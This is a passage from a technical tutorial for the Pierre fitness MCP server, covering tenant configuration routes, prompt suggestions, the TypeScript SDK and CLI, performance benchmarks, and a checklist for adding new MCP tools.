#[derive(Clone)]
pub struct FitnessConfigurationRoutes {
resources: Arc<crate::mcp::resources::ServerResources>,
}
impl FitnessConfigurationRoutes {
/// GET /api/fitness-configurations - List all configuration names for user
pub async fn list_configurations(
&self,
auth: &AuthResult,
) -> AppResult<FitnessConfigurationListResponse> {
let processing_start = std::time::Instant::now();
let user_id = auth.user_id;
let tenant_id = self.get_user_tenant(user_id).await?;
let tenant_id_str = tenant_id.to_string();
let user_id_str = user_id.to_string();
// Get both user-specific and tenant-level configurations
let mut configurations = self
.resources
.database
.list_user_fitness_configurations(&tenant_id_str, &user_id_str)
.await?;
let tenant_configs = self
.resources
.database
.list_tenant_fitness_configurations(&tenant_id_str)
.await?;
configurations.extend(tenant_configs);
configurations.sort();
configurations.dedup();
Ok(FitnessConfigurationListResponse {
total_count: configurations.len(),
configurations,
metadata: Self::create_metadata(processing_start),
})
}
}
}
Key detail: the list endpoint merges user-specific and tenant-level configs, deduplicates them, and returns a simple list of names. This mirrors how the MCP tools can resolve configuration precedence (user overrides tenant defaults).
Resolving Tenant Context
get_user_tenant extracts the tenant ID from the authenticated user.
Source: src/fitness_configuration_routes.rs:66-88
#![allow(unused)]
fn main() {
async fn get_user_tenant(&self, user_id: Uuid) -> AppResult<Uuid> {
let user = self
.resources
.database
.get_user(user_id)
.await?
.ok_or_else(|| AppError::not_found(format!("User {user_id}")))?;
let tenant_id = user
.tenant_id
.as_ref()
.and_then(|id| Uuid::parse_str(id).ok())
.ok_or_else(||
AppError::invalid_input(format!("User has no valid tenant: {user_id}"))
)?;
Ok(tenant_id)
}
}
This helper is reused across fitness configuration handlers to ensure every configuration is bound to the correct tenant.
Prompt Suggestions System
Pierre includes a database-backed prompt suggestions system for AI chat interfaces. Prompts are organized into categories with visual theming based on “pillars” (Activity, Nutrition, Recovery).
Pillar Types
Source: src/database/prompts.rs
#![allow(unused)]
fn main() {
/// Pillar types for visual categorization of prompts
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "lowercase")]
pub enum Pillar {
/// Activity pillar (Emerald gradient)
Activity,
/// Nutrition pillar (Amber gradient)
Nutrition,
/// Recovery pillar (Indigo gradient)
Recovery,
}
}
Prompt Category Model
#![allow(unused)]
fn main() {
/// A prompt suggestion category with its prompts
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PromptCategory {
/// Unique ID
pub id: Uuid,
/// Tenant this category belongs to
pub tenant_id: String,
/// Unique key (e.g., "training", "nutrition")
pub category_key: String,
/// Display title
pub category_title: String,
/// Emoji icon
pub category_icon: String,
/// Visual pillar classification
pub pillar: Pillar,
/// List of prompt suggestions
pub prompts: Vec<String>,
/// Display order (lower numbers shown first)
pub display_order: i32,
/// Whether active
pub is_active: bool,
}
}
Default Categories
New tenants receive default prompt categories:
| Category | Icon | Pillar | Sample Prompts |
|---|---|---|---|
| Training | 🏃 | Activity | “What should I focus on today?”, “Analyze my form” |
| Nutrition | 🥗 | Nutrition | “Plan my pre-workout meal”, “Calculate my macros” |
| Recovery | 😴 | Recovery | “Review my sleep quality”, “Optimize my recovery” |
API Endpoints
Source: src/routes/prompts.rs
| Method | Endpoint | Description |
|---|---|---|
GET | /api/prompts/categories | List active categories for tenant |
POST | /api/prompts/categories | Create new category |
PUT | /api/prompts/categories/:key | Update category |
DELETE | /api/prompts/categories/:key | Delete category |
GET | /api/prompts/welcome | Get welcome prompt for new users |
Response Format
{
"categories": [
{
"category_key": "training",
"category_title": "Training",
"category_icon": "🏃",
"pillar": "activity",
"prompts": [
"What should I focus on in today's training?",
"Analyze my running form from recent activities"
]
}
]
}
Tenant Isolation
Prompts are strictly tenant-isolated:
- Each tenant has their own prompt categories
- Categories are scoped by
tenant_idin all queries - Tenants can customize prompts without affecting others
Relationship to Earlier Chapters
- Chapter 7 (multi-tenant isolation): Covered database-level tenant separation; here you see the HTTP admin surface for managing tenants.
- Chapters 15–16 (OAuth server & client): Explained OAuth protocols; tenant routes add per-tenant OAuth credentials and app registration.
- Chapter 19 (tools guide): Configuration tools like
get_fitness_configandset_fitness_configultimately call into these REST routes under the hood (directly or via internal services). - Chapter 26 (LLM providers): Prompt suggestions power the AI chat interface that uses LLM providers.
Key Takeaways
- Tenants: Represent customers, each with their own slug, domain, plan, and OAuth configuration.
- Tenant OAuth:
ConfigureTenantOAuthRequestbinds provider credentials to a tenant, enabling “bring your own app” flows. - OAuth apps: Tenants can register OAuth clients for integrating external MCP tooling with Pierre.
- Fitness configs: Tenant- and user-scoped fitness configurations are stored via dedicated REST routes and used by intelligence algorithms.
- Precedence: User configs override tenant defaults, but both are visible via
list_configurations. - Prompt suggestions: Tenant-scoped prompt categories power AI chat interfaces with visual pillar theming.
- Admin APIs: These HTTP routes are the operational surface for SaaS administrators and automation tools.
Chapter 29: TypeScript SDK & CLI Usage
This appendix explains how to use the Pierre TypeScript SDK and command-line interface to connect MCP hosts to the Pierre server. You’ll learn about the main SDK entry points, CLI flags, and environment-driven configuration.
SDK Entrypoint
The SDK exposes the MCP bridge client and all generated tool types from a single module.
Source: sdk/src/index.ts:1-20
// ABOUTME: Main entry point for Pierre MCP Client TypeScript SDK
// ABOUTME: Re-exports MCP client and configuration for programmatic integration
/**
* Pierre MCP Client SDK
*/
export { PierreMcpClient, BridgeConfig } from './bridge';
/**
* Export all TypeScript type definitions for Pierre MCP tools
*
* These types are auto-generated from server tool schemas.
* To regenerate: npm run generate-types
*/
export * from './types';
Usage (programmatic):
import { PierreMcpClient, BridgeConfig } from 'pierre-mcp-client-sdk';
const config: BridgeConfig = {
pierreServerUrl: 'https://api.pierre.ai',
jwtToken: process.env.PIERRE_JWT_TOKEN,
};
const client = new PierreMcpClient(config);
await client.start();
// ... interact via MCP stdio protocol ...
Programmatic usage is mostly relevant if you are embedding Pierre into a larger Node-based MCP host; for most users, the CLI wrapper is the primary entrypoint.
CLI Overview
The CLI wraps PierreMcpClient and exposes it as a standard MCP client binary.
Source: sdk/src/cli.ts:1-29
#!/usr/bin/env bun
// ABOUTME: Command-line interface for Pierre MCP Client
// ABOUTME: Parses arguments, configures MCP client, and manages process lifecycle
/**
* Pierre MCP Client CLI
*
* MCP-compliant client connecting MCP hosts to Pierre Fitness MCP Server (HTTP + OAuth 2.0)
*/
import { Command } from 'commander';
import { PierreMcpClient } from './bridge';
// DEBUG: Log environment at startup (stderr only - stdout is for MCP protocol)
console.error('[DEBUG] Bridge CLI starting...');
console.error('[DEBUG] CI environment variables:');
console.error(` process.env.CI = ${process.env.CI}`);
console.error(` process.env.GITHUB_ACTIONS = ${process.env.GITHUB_ACTIONS}`);
console.error(` process.env.NODE_ENV = ${process.env.NODE_ENV}`);
console.error('[DEBUG] Auth environment variables:');
console.error(` PIERRE_JWT_TOKEN = ${process.env.PIERRE_JWT_TOKEN ? '[SET]' : '[NOT SET]'}`);
console.error(` PIERRE_SERVER_URL = ${process.env.PIERRE_SERVER_URL || '[NOT SET]'}`);
const program = new Command();
Design details:
- All debug logs go to stderr so stdout remains clean JSON-RPC for MCP.
commanderhandles argument parsing, default values, and--helpoutput.- The CLI is intended to be invoked by an MCP host (e.g., Claude Desktop, VS Code, etc.).
CLI Options & Environment Variables
The CLI exposes a set of options with sensible environment fallbacks.
Source: sdk/src/cli.ts:31-63
program
.name('pierre-mcp-client')
.description('MCP client connecting to Pierre Fitness MCP Server')
.version('1.0.0')
.option('-s, --server <url>', 'Pierre MCP server URL', process.env.PIERRE_SERVER_URL || 'http://localhost:8080')
.option('-t, --token <jwt>', 'JWT authentication token', process.env.PIERRE_JWT_TOKEN)
.option('--oauth-client-id <id>', 'OAuth 2.0 client ID', process.env.PIERRE_OAUTH_CLIENT_ID)
.option('--oauth-client-secret <secret>', 'OAuth 2.0 client secret', process.env.PIERRE_OAUTH_CLIENT_SECRET)
.option('--user-email <email>', 'User email for automated login', process.env.PIERRE_USER_EMAIL)
.option('--user-password <password>', 'User password for automated login', process.env.PIERRE_USER_PASSWORD)
.option('--callback-port <port>', 'OAuth callback server port', process.env.PIERRE_CALLBACK_PORT || '35535')
.option('--no-browser', 'Disable automatic browser opening for OAuth (testing mode)')
.option('--token-validation-timeout <ms>', 'Token validation timeout in milliseconds (default: 3000)', process.env.PIERRE_TOKEN_VALIDATION_TIMEOUT_MS || '3000')
.option('--proactive-connection-timeout <ms>', 'Proactive connection timeout in milliseconds (default: 5000)', process.env.PIERRE_PROACTIVE_CONNECTION_TIMEOUT_MS || '5000')
.option('--proactive-tools-list-timeout <ms>', 'Proactive tools list timeout in milliseconds (default: 3000)', process.env.PIERRE_PROACTIVE_TOOLS_LIST_TIMEOUT_MS || '3000')
.option('--tool-call-connection-timeout <ms>', 'Tool-triggered connection timeout in milliseconds (default: 10000)', process.env.PIERRE_TOOL_CALL_CONNECTION_TIMEOUT_MS || '10000')
Common environment variables:
PIERRE_SERVER_URL: Base URL for the Pierre server (https://api.pierre.aiin production).PIERRE_JWT_TOKEN: Pre-issued JWT for authenticating the bridge (see Chapter 6 / 15).PIERRE_OAUTH_CLIENT_ID/PIERRE_OAUTH_CLIENT_SECRET: OAuth client for the bridge itself.PIERRE_USER_EMAIL/PIERRE_USER_PASSWORD: For automated login flows (CI/testing).PIERRE_CALLBACK_PORT: Port for the local OAuth callback HTTP server.
Example CLI invocation:
# Minimal: rely on environment variables
export PIERRE_SERVER_URL="https://api.pierre.ai"
export PIERRE_JWT_TOKEN="<your-jwt>"
pierre-mcp-client
# Explicit flags (override env)
pierre-mcp-client \
--server https://api.pierre.ai \
--token "$PIERRE_JWT_TOKEN" \
--oauth-client-id "$PIERRE_OAUTH_CLIENT_ID" \
--oauth-client-secret "$PIERRE_OAUTH_CLIENT_SECRET" \
--no-browser
Bridge Configuration Wiring
The CLI simply maps parsed options into a BridgeConfig and starts the bridge.
Source: sdk/src/cli.ts:63-92
.action(async (options) => {
try {
const bridge = new PierreMcpClient({
pierreServerUrl: options.server,
jwtToken: options.token,
oauthClientId: options.oauthClientId,
oauthClientSecret: options.oauthClientSecret,
userEmail: options.userEmail,
userPassword: options.userPassword,
callbackPort: parseInt(options.callbackPort, 10),
disableBrowser: !options.browser,
tokenValidationTimeoutMs: parseInt(options.tokenValidationTimeout, 10),
proactiveConnectionTimeoutMs: parseInt(options.proactiveConnectionTimeout, 10),
proactiveToolsListTimeoutMs: parseInt(options.proactiveToolsListTimeout, 10),
toolCallConnectionTimeoutMs: parseInt(options.toolCallConnectionTimeout, 10)
});
await bridge.start();
// Store bridge instance for cleanup on shutdown
(global as any).__bridge = bridge;
} catch (error) {
console.error('Bridge failed to start:', error);
process.exit(1);
}
});
See Chapter 13 for a deeper dive into PierreMcpClient and the BridgeConfig fields (OAuth flows, secure token storage, proactive connections, etc.). The CLI is a thin wrapper on that logic.
Graceful Shutdown
The CLI handles termination signals and calls bridge.stop() to clean up resources.
Source: sdk/src/cli.ts:94-134
// Handle graceful shutdown
let shutdownInProgress = false;
const handleShutdown = (signal: string) => {
if (shutdownInProgress) {
console.error('\n⚠️ Forcing immediate exit...');
process.exit(1);
}
shutdownInProgress = true;
console.error(`\n🛑 Bridge shutting down (${signal})...`);
const bridge = (global as any).__bridge;
if (bridge) {
bridge.stop()
.then(() => {
console.error('✅ Bridge stopped cleanly');
process.exit(0);
})
.catch((error: any) => {
console.error('Error during shutdown:', error);
process.exit(1);
});
} else {
process.exit(0);
}
};
process.on('SIGINT', () => handleShutdown('SIGINT'));
process.on('SIGTERM', () => handleShutdown('SIGTERM'));
program.parse();
Why this matters:
- MCP hosts often manage client processes; clean shutdown avoids leaving stuck TCP connections or zombie OAuth callback servers.
- Double-pressing Ctrl+C forces immediate exit if shutdown is already in progress.
Typical MCP Host Configuration
Most MCP hosts require a JSON manifest pointing to the CLI binary, for example:
{
"name": "pierre-fitness",
"command": "pierre-mcp-client",
"args": [],
"env": {
"PIERRE_SERVER_URL": "https://api.pierre.ai",
"PIERRE_JWT_TOKEN": "${PIERRE_JWT_TOKEN}"
}
}
The host spawns pierre-mcp-client, speaks JSON-RPC 2.0 over stdio, and the bridge translates MCP calls into HTTP/OAuth interactions with the Pierre server.
Key Takeaways
- SDK entrypoint:
sdk/src/index.tsre-exportsPierreMcpClient,BridgeConfig, and all tool types for programmatic use. - CLI wrapper:
pierre-mcp-clientis a thin layer overPierreMcpClientthat wires CLI options intoBridgeConfig. - Env-driven config: Most options have environment fallbacks, enabling headless and CI-friendly setups.
- Stderr vs stdout: Debug logs go to stderr so stdout remains pure MCP JSON-RPC.
- Graceful shutdown: Signal handlers call
bridge.stop()to close connections and clean up resources. - Host integration: MCP hosts simply execute the CLI and communicate over stdio; no extra glue code is required.
Chapter 30: Performance Characteristics & Benchmarks
This appendix documents Pierre’s performance characteristics, optimization strategies, and benchmarking guidelines for production deployments.
Performance Overview
Pierre is designed for low-latency fitness data processing with the following targets:
| Operation | Target Latency | Notes |
|---|---|---|
| Health check | < 5ms | No DB, no auth |
| JWT validation | < 10ms | Cached JWKS |
| Simple tool call | < 50ms | Cached data |
| Provider API call | < 500ms | Network-bound |
| TSS calculation | < 20ms | CPU-bound |
| Complex analysis | < 200ms | Multi-algorithm |
Algorithmic Complexity
Training Load Calculations
| Algorithm | Time Complexity | Space Complexity |
|---|---|---|
| Average Power TSS | O(1) | O(1) |
| Normalized Power TSS | O(n) | O(w) where w=window |
| TRIMP | O(n) | O(1) |
| CTL/ATL/TSB | O(n) | O(1) per activity |
| VO2max estimation | O(1) | O(1) |
Normalized Power calculation:
#![allow(unused)]
fn main() {
// O(n) where n = power samples
// O(w) space for rolling window
pub fn calculate_np(power_stream: &[f64], window_seconds: u32) -> f64 {
// 30-second rolling average of power^4
let window_size = window_seconds as usize;
let rolling_averages: Vec<f64> = power_stream
.windows(window_size) // O(n) iterations
.map(|w| w.iter().sum::<f64>() / w.len() as f64) // O(w) per window
.collect();
// Fourth root of mean of fourth powers
let mean_fourth = rolling_averages.iter()
.map(|p| p.powi(4))
.sum::<f64>() / rolling_averages.len() as f64;
mean_fourth.powf(0.25)
}
}
Database Operations
| Operation | Complexity | Index Used |
|---|---|---|
| Get user by ID | O(1) | PRIMARY KEY |
| Get user by email | O(log n) | idx_users_email |
| List activities (paginated) | O(k + log n) | Composite index |
| Get OAuth token | O(1) | UNIQUE constraint |
| Usage analytics (monthly) | O(log n) | idx_api_key_usage_timestamp |
Memory Characteristics
Static Memory
| Component | Approximate Size |
|---|---|
| Binary size | ~45 MB |
| Startup memory | ~50 MB |
| Per connection | ~8 KB |
| SQLite pool (10 conn) | ~2 MB |
| JWKS cache | ~100 KB |
| LRU cache (default) | ~10 MB |
Dynamic Memory
Activity processing:
#![allow(unused)]
fn main() {
// Memory per activity analysis
// - Activity struct: ~500 bytes
// - Power stream (1 hour @ 1Hz): 3600 * 8 = 29 KB
// - Heart rate stream: 3600 * 8 = 29 KB
// - GPS stream: 3600 * 24 = 86 KB
// - Analysis result: ~2 KB
// Total per activity: ~150 KB peak
}
Concurrent request handling:
#![allow(unused)]
fn main() {
// Per-request memory estimate
// - Request parsing: ~4 KB
// - Auth context: ~1 KB
// - Response buffer: ~8 KB
// - Tool execution: ~50 KB (varies by tool)
// Total per request: ~65 KB average
}
Concurrency Model
Tokio Runtime Configuration
// Production runtime (src/bin/pierre-mcp-server.rs)
#[tokio::main(flavor = "multi_thread")]
async fn main() {
// Worker threads = CPU cores
// I/O threads = 2 * CPU cores
}
Connection Pooling
#![allow(unused)]
fn main() {
// SQLite pool configuration
SqlitePoolOptions::new()
.max_connections(10) // Max concurrent DB connections
.min_connections(2) // Keep-alive connections
.acquire_timeout(Duration::from_secs(30))
.idle_timeout(Some(Duration::from_secs(600)))
}
Rate Limiting
| Tier | Requests/Month | Burst Limit | Window |
|---|---|---|---|
| Trial | 1,000 | 10/min | 30 days |
| Starter | 10,000 | 60/min | 30 days |
| Professional | 100,000 | 300/min | 30 days |
| Enterprise | Unlimited | 1000/min | N/A |
Optimization Strategies
1. Lazy Loading
#![allow(unused)]
fn main() {
// Providers loaded only when needed
impl ProviderRegistry {
pub fn get(&self, name: &str) -> Option<Arc<dyn FitnessProvider>> {
// Factory creates provider on first access
self.factories.get(name)?.create_provider()
}
}
}
2. Response Caching
#![allow(unused)]
fn main() {
// LRU cache for expensive computations
pub struct Cache {
lru: Mutex<LruCache<String, CacheEntry>>,
default_ttl: Duration,
}
// Cache key patterns
// - activities:{provider}:{user_id} -> Vec<Activity>
// - athlete:{provider}:{user_id} -> Athlete
// - stats:{provider}:{user_id} -> Stats
// - analysis:{activity_id} -> AnalysisResult
}
3. Query Optimization
#![allow(unused)]
fn main() {
// Efficient pagination with cursor-based approach
pub async fn list_activities_paginated(
&self,
user_id: Uuid,
cursor: Option<&str>,
limit: u32,
) -> Result<CursorPage<Activity>> {
// Uses indexed seek instead of OFFSET
sqlx::query_as!(
Activity,
r#"
SELECT * FROM activities
WHERE user_id = ?1 AND id > ?2
ORDER BY id
LIMIT ?3
"#,
user_id,
cursor.unwrap_or(""),
limit + 1 // Fetch one extra to detect has_more
)
.fetch_all(&self.pool)
.await
}
}
4. Zero-Copy Serialization
#![allow(unused)]
fn main() {
// Use Cow<str> for borrowed strings
pub struct ActivityResponse<'a> {
pub id: Cow<'a, str>,
pub name: Cow<'a, str>,
// Avoids cloning when data comes from cache
}
}
Benchmarking Guidelines
Running Benchmarks
# Install criterion
cargo install cargo-criterion
# Run all benchmarks
cargo criterion
# Run specific benchmark
cargo criterion --bench tss_calculation
# Generate HTML report
cargo criterion --bench tss_calculation -- --save-baseline main
Example Benchmark
#![allow(unused)]
fn main() {
// benches/tss_benchmark.rs
use criterion::{black_box, criterion_group, criterion_main, Criterion};
fn tss_benchmark(c: &mut Criterion) {
let activity = create_test_activity(3600); // 1 hour
c.bench_function("tss_avg_power", |b| {
b.iter(|| {
TssAlgorithm::AvgPower.calculate(
black_box(&activity),
black_box(250.0),
black_box(1.0),
)
})
});
c.bench_function("tss_normalized_power", |b| {
b.iter(|| {
TssAlgorithm::NormalizedPower { window_seconds: 30 }
.calculate(
black_box(&activity),
black_box(250.0),
black_box(1.0),
)
})
});
}
criterion_group!(benches, tss_benchmark);
criterion_main!(benches);
}
Expected Results
| Benchmark | Expected Time | Acceptable Range |
|---|---|---|
| TSS (avg power) | 50 ns | < 100 ns |
| TSS (normalized) | 15 µs | < 50 µs |
| JWT validation | 100 µs | < 500 µs |
| Activity parse | 200 µs | < 1 ms |
| SQLite query | 500 µs | < 5 ms |
Production Monitoring
Key Metrics
#![allow(unused)]
fn main() {
// Prometheus metrics exposed at /metrics
counter!("pierre_requests_total", "method" => method, "status" => status);
histogram!("pierre_request_duration_seconds", "method" => method);
gauge!("pierre_active_connections");
gauge!("pierre_db_pool_connections");
counter!("pierre_provider_requests_total", "provider" => provider);
histogram!("pierre_provider_latency_seconds", "provider" => provider);
}
Alert Thresholds
| Metric | Warning | Critical |
|---|---|---|
| Request latency p99 | > 500ms | > 2s |
| Error rate | > 1% | > 5% |
| DB pool saturation | > 70% | > 90% |
| Memory usage | > 70% | > 90% |
| Provider latency p99 | > 2s | > 10s |
Profiling
CPU Profiling
# Using perf
perf record -g cargo run --release
perf report
# Using flamegraph
cargo install flamegraph
cargo flamegraph --bin pierre-mcp-server
Memory Profiling
# Using heaptrack
heaptrack cargo run --release
heaptrack_gui heaptrack.pierre-mcp-server.*.gz
# Using valgrind
valgrind --tool=massif ./target/release/pierre-mcp-server
ms_print massif.out.*
Key Takeaways
- Target latencies: Simple operations < 50ms, provider calls < 500ms.
- Algorithm efficiency: NP-TSS is O(n), use AvgPower-TSS for quick estimates.
- Memory footprint: ~50MB baseline, ~150KB per activity analysis.
- Connection pooling: 10 SQLite connections handle typical workloads.
- Cursor pagination: Avoids O(n) OFFSET performance degradation.
- LRU caching: Reduces provider API calls and computation.
- Prometheus metrics: Monitor latency, error rates, pool saturation.
- Benchmark before optimize: Use criterion for reproducible measurements.
Related Chapters:
- Chapter 20: Sports Science Algorithms (algorithm complexity)
- Chapter 25: Deployment (production configuration)
- Appendix E: Rate Limiting (quota management)
Chapter 31: Adding New MCP Tools - Complete Checklist
This appendix provides a comprehensive checklist for adding new MCP tools to Pierre. Following this checklist ensures tools are properly integrated across all layers and tested.
Quick Reference Checklist
Use this checklist when adding new tools:
□ 1. Constants - src/constants/tools/identifiers.rs
□ 2. Schema - src/mcp/schema.rs (import + create_*_tool fn + register)
□ 3. ToolId Enum - src/protocols/universal/tool_registry.rs (enum + from_name + name)
□ 4. Handler - src/protocols/universal/handlers/*.rs
□ 5. Executor - src/protocols/universal/executor.rs (import + register)
□ 6. Tests - tests/mcp_tools_unit.rs (presence + schema validation)
□ 7. Tests - tests/schema_completeness_test.rs (critical tools list)
□ 8. SDK Tests - sdk/test/integration/tool-call-validation.test.js
□ 9. Docs - docs/tools-reference.md
□ 10. Tutorial - docs/tutorial/chapter-19-tools-guide.md (update counts)
□ 11. Clippy - cargo clippy --all-targets (strict mode)
□ 12. Run Tests - cargo test (targeted tests for new tools)
Step-by-Step Guide
Step 1: Add Tool Identifier Constant
File: src/constants/tools/identifiers.rs
Add a constant for your tool name:
#![allow(unused)]
fn main() {
/// Recipe management tools (Combat des Chefs)
pub const GET_RECIPE_CONSTRAINTS: &str = "get_recipe_constraints";
pub const LIST_RECIPES: &str = "list_recipes";
pub const GET_RECIPE: &str = "get_recipe";
// ... add your tool constant here
}
Why: Eliminates hardcoded strings, enables compile-time checking.
Step 2: Create Tool Schema
File: src/mcp/schema.rs
2a. Add import for your constant:
#![allow(unused)]
fn main() {
use crate::constants::tools::{
// ... existing imports ...
YOUR_NEW_TOOL, // Add your constant
};
}
2b. Create schema function:
#![allow(unused)]
fn main() {
/// Create the `your_new_tool` tool schema
fn create_your_new_tool_tool() -> ToolSchema {
let mut properties = HashMap::new();
// Add required parameters
properties.insert(
"param_name".to_owned(),
PropertySchema {
property_type: "string".into(),
description: Some("Description of parameter".into()),
},
);
// Add optional parameters
properties.insert(
"limit".to_owned(),
PropertySchema {
property_type: "number".into(),
description: Some("Maximum results (default: 10)".into()),
},
);
ToolSchema {
name: YOUR_NEW_TOOL.to_owned(), // Use constant!
description: "Clear description of what the tool does".into(),
input_schema: JsonSchema {
schema_type: "object".into(),
properties: Some(properties),
required: Some(vec!["param_name".to_owned()]), // Required params
},
}
}
}
2c. Register in create_fitness_tools():
#![allow(unused)]
fn main() {
fn create_fitness_tools() -> Vec<ToolSchema> {
vec![
// ... existing tools ...
create_your_new_tool_tool(), // Add here
]
}
}
Step 3: Add to ToolId Enum
File: src/protocols/universal/tool_registry.rs
3a. Add import:
#![allow(unused)]
fn main() {
use crate::constants::tools::{
// ... existing imports ...
YOUR_NEW_TOOL,
};
}
3b. Add enum variant:
#![allow(unused)]
fn main() {
pub enum ToolId {
// ... existing variants ...
/// Your tool description
YourNewTool,
}
}
3c. Add to from_name():
#![allow(unused)]
fn main() {
pub fn from_name(name: &str) -> Option<Self> {
match name {
// ... existing matches ...
YOUR_NEW_TOOL => Some(Self::YourNewTool),
_ => None,
}
}
}
3d. Add to name():
#![allow(unused)]
fn main() {
pub const fn name(&self) -> &'static str {
match self {
// ... existing matches ...
Self::YourNewTool => YOUR_NEW_TOOL,
}
}
}
3e. Add to description():
#![allow(unused)]
fn main() {
pub const fn description(&self) -> &'static str {
match self {
// ... existing matches ...
Self::YourNewTool => "Your tool description",
}
}
}
Step 4: Create Handler Function
File: src/protocols/universal/handlers/your_module.rs (or existing file)
#![allow(unused)]
fn main() {
/// Handle `your_new_tool` - description of what it does
///
/// # Arguments
/// * `executor` - Universal executor with database and auth context
/// * `request` - MCP request containing tool parameters
///
/// # Returns
/// JSON response with tool results or error
pub async fn handle_your_new_tool(
executor: Arc<UniversalExecutor>,
request: UniversalRequest,
) -> UniversalResponse {
// Extract parameters
let params = match request.params.as_ref() {
Some(p) => p,
None => return error_response(-32602, "Missing parameters"),
};
// Parse required parameters
let param_name = match params.get("param_name").and_then(|v| v.as_str()) {
Some(p) => p,
None => return error_response(-32602, "Missing required parameter: param_name"),
};
// Get user context
let user_id = match executor.user_id() {
Some(id) => id,
None => return error_response(-32603, "Authentication required"),
};
// Execute business logic
match do_something(user_id, param_name).await {
Ok(result) => success_response(result),
Err(e) => error_response(-32603, &e.to_string()),
}
}
}
Step 5: Register in Executor
File: src/protocols/universal/executor.rs
5a. Add import:
#![allow(unused)]
fn main() {
use crate::protocols::universal::handlers::your_module::handle_your_new_tool;
}
5b. Register handler:
#![allow(unused)]
fn main() {
impl UniversalExecutor {
fn register_tools(&mut self) {
// ... existing registrations ...
self.register_handler(
ToolId::YourNewTool,
|executor, request| Box::pin(handle_your_new_tool(executor, request)),
);
}
}
}
Step 6: Add Unit Tests
File: tests/mcp_tools_unit.rs
6a. Add to presence test:
#![allow(unused)]
fn main() {
#[test]
fn test_mcp_tool_schemas() {
let tools = get_tools();
let tool_names: Vec<&str> = tools.iter().map(|t| t.name.as_str()).collect();
// ... existing assertions ...
// Your new tools
assert!(tool_names.contains(&"your_new_tool"));
}
}
6b. Add schema validation test:
#![allow(unused)]
fn main() {
#[test]
fn test_your_new_tool_schema() {
let tools = get_tools();
let tool = tools
.iter()
.find(|t| t.name == "your_new_tool")
.expect("your_new_tool tool should exist");
assert!(tool.description.contains("expected keyword"));
if let Some(required) = &tool.input_schema.required {
assert!(required.contains(&"param_name".to_owned()));
} else {
panic!("your_new_tool should have required parameters");
}
}
}
Step 7: Add to Critical Tools List
File: tests/schema_completeness_test.rs
#![allow(unused)]
fn main() {
#[test]
fn test_critical_tools_are_present() {
let critical_tools = vec![
// ... existing tools ...
"your_new_tool",
];
// ...
}
}
Step 8: Add SDK Tests
File: sdk/test/integration/tool-call-validation.test.js
const toolCallTests = [
// ... existing tests ...
{
name: 'your_new_tool',
description: 'Your tool description',
arguments: { param_name: 'test-value' },
expectedError: null // or /expected error pattern/
},
];
Step 9: Update Documentation
File: docs/tools-reference.md
Add tool to the appropriate category section.
File: docs/tutorial/chapter-19-tools-guide.md
Update tool counts in the overview section.
Step 10: Run Validation
# Format code
cargo fmt
# Run clippy strict mode
cargo clippy --all-targets --quiet -- \
-D warnings -D clippy::all -D clippy::pedantic -D clippy::nursery
# Run targeted tests
cargo test your_new_tool -- --nocapture
cargo test test_mcp_tool_schemas -- --nocapture
cargo test test_recipe_tool_schemas -- --nocapture # if recipe tool
# Run SDK tests
cd sdk && npm test
Common Mistakes to Avoid
1. Forgetting to use constants
#![allow(unused)]
fn main() {
// WRONG - hardcoded string
name: "your_new_tool".to_owned(),
// CORRECT - use constant
name: YOUR_NEW_TOOL.to_owned(),
}
2. Missing from ToolId enum
If you see “Unknown tool” errors, check that your tool is in:
ToolIdenum variantfrom_name()match armname()match arm
3. Not registering handler in executor
Handler must be registered in executor.rs or tools will fail with internal errors.
4. Forgetting to update test counts
Update tool counts in:
tests/mcp_tools_unit.rstests/configuration_mcp_integration_test.rstests/mcp_multitenant_complete_test.rs
5. Not adding clippy allow in test files
Test files need:
#![allow(unused)]
#![allow(clippy::unwrap_used, clippy::expect_used, clippy::panic)]
fn main() {
}
File Reference Summary
| File | Purpose |
|---|---|
src/constants/tools/identifiers.rs | Tool name constants |
src/mcp/schema.rs | Tool schemas for MCP discovery |
src/protocols/universal/tool_registry.rs | Type-safe ToolId enum |
src/protocols/universal/handlers/*.rs | Handler implementations |
src/protocols/universal/executor.rs | Handler registration |
tests/mcp_tools_unit.rs | Schema validation tests |
tests/schema_completeness_test.rs | Registry completeness tests |
sdk/test/integration/tool-call-validation.test.js | SDK integration tests |
docs/tools-reference.md | Tool documentation |
docs/tutorial/chapter-19-tools-guide.md | Tool usage guide |
Example: Complete Tool Addition
See the recipe tools implementation for a complete example:
- Constants:
src/constants/tools/identifiers.rs(lines 77-90) - Schemas:
src/mcp/schema.rs(search forcreate_list_recipes_tool) - ToolId:
src/protocols/universal/tool_registry.rs(search forListRecipes) - Handlers:
src/protocols/universal/handlers/recipes.rs - Executor:
src/protocols/universal/executor.rs(search forhandle_list_recipes) - Tests:
tests/mcp_tools_unit.rs(search fortest_recipe_tool_schemas)
Chapter 32: SDK Development Tutorial
This chapter provides a hands-on guide to developing and extending the Pierre TypeScript SDK. You’ll learn how to set up your development environment, run tests, generate types, and modify the bridge client.
Development Environment Setup
1. Install Dependencies
cd sdk
npm install
The SDK uses these key dependencies:
@modelcontextprotocol/sdk: Official MCP SDK for protocol compliance@napi-rs/keyring: OS-native secure credential storagecommander: CLI argument parsingajv: JSON Schema validation
2. Build the SDK
# Production build (esbuild)
npm run build
# Type checking only (no emit)
npm run type-check
# Full TypeScript compilation (for debugging)
npm run build:tsc
Source: sdk/package.json:12-14
{
"scripts": {
"build": "node esbuild.config.mjs",
"build:tsc": "tsc",
"type-check": "tsc --noEmit"
}
}
The esbuild bundler creates optimized production builds in dist/:
dist/index.js: SDK library entry pointdist/cli.js: CLI binary
3. Development Mode
For rapid iteration, use tsx to run TypeScript directly:
# Run CLI in development mode
npm run dev
# Or run directly with environment variables
PIERRE_SERVER_URL=http://localhost:8081 npm run dev
SDK Directory Structure
sdk/
├── src/
│ ├── bridge.ts # MCP bridge client (98KB, main logic)
│ ├── cli.ts # CLI wrapper and argument parsing
│ ├── index.ts # SDK entry point and exports
│ ├── secure-storage.ts # OS keychain integration
│ └── types.ts # Auto-generated TypeScript types
├── test/
│ ├── unit/ # Unit tests
│ ├── integration/ # Integration tests
│ ├── e2e/ # End-to-end tests
│ ├── fixtures/ # Test data fixtures
│ └── helpers/ # Test utilities
├── dist/ # Build output
├── package.json # npm configuration
├── tsconfig.json # TypeScript configuration
├── esbuild.config.mjs # Build configuration
└── eslint.config.js # Linting rules
Running Tests
